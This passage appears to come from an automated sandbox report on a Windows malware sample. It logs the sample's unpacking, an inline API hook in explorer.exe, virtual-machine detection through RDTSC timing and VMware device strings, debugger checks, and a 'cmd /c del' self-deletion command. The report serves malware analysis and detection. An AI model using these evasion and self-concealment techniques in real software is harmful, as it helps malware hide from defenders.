          Source: C:\Windows\System32\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\444890321.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\444890321.exeProcess created: C:\Users\user\Desktop\444890321.exe 'C:\Users\user\Desktop\444890321.exe'
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\444890321.exe'
          Source: C:\Users\user\Desktop\444890321.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: WWAHost.pdb source: 444890321.exe, 00000001.00000002.265580843.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000004.00000000.238969976.000000000F6D2000.00000004.00000001.sdmp
          Source: Binary string: WWAHost.pdbUGP source: 444890321.exe, 00000001.00000002.265580843.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 444890321.exe, 00000000.00000003.207642896.00000000099C0000.00000004.00000001.sdmp, 444890321.exe, 00000001.00000002.265126021.0000000000A8F000.00000040.00000001.sdmp, WWAHost.exe, 0000000A.00000002.470470953.0000000003F0F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 444890321.exe, WWAHost.exe
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000004.00000000.238969976.000000000F6D2000.00000004.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\444890321.exeUnpacked PE file: 1.2.444890321.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_740D2F60 push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_004198E6 pushad ; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00417AA0 push 00FCAB15h; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00416608 push esp; iretd
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0041CEF2 push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0041CEFB push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0041CEA5 push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0041CF5C push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00416FE8 push ss; retf
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009ED0D1 push ecx; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_004198E6 pushad ; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00417AA0 push 00FCAB15h; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00416608 push esp; iretd
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_0041CEF2 push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_0041CEFB push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_0041CEA5 push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_0041CF5C push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00416FE8 push ss; retf
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E6D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03247AA0 push 00FCAB15h; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_032498E6 pushad ; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0324CF5C push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03246FE8 push ss; retf
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03246608 push esp; iretd
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0324CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0324CEF2 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0324CEFB push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeFile created: C:\Users\user\AppData\Local\Temp\nskAF64.tmp\System.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE2
          Source: C:\Users\user\Desktop\444890321.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\444890321.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\444890321.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 00000000032398E4 second address: 00000000032398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000003239B4E second address: 0000000003239B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\444890321.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00409A80 rdtsc
          Source: C:\Windows\explorer.exe TID: 5972Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 5620Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\System32\TileDataRepository.dll
          Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\system32\Windows.StateRepository.dll
          Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\SYSTEM32\usermgrcli.dll
          Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\System32\Windows.StateRepositoryPS.dll
          Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\system32\StateRepository.Core.dll
          Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\System32\usermgrproxy.dll
          Source: explorer.exe, 00000004.00000000.232897500.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.232897500.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000004.00000000.238969976.000000000F6D2000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.234236228.00000000088C3000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.230436336.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.232735858.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.254896595.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000004.00000000.232897500.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000004.00000000.232897500.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.233860627.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000004.00000000.255132392.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000000.230436336.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.230436336.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.232897500.000000000871F000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAJ
          Source: explorer.exe, 00000004.00000000.230436336.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\444890321.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\444890321.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00999080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A61074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00995210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A68A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
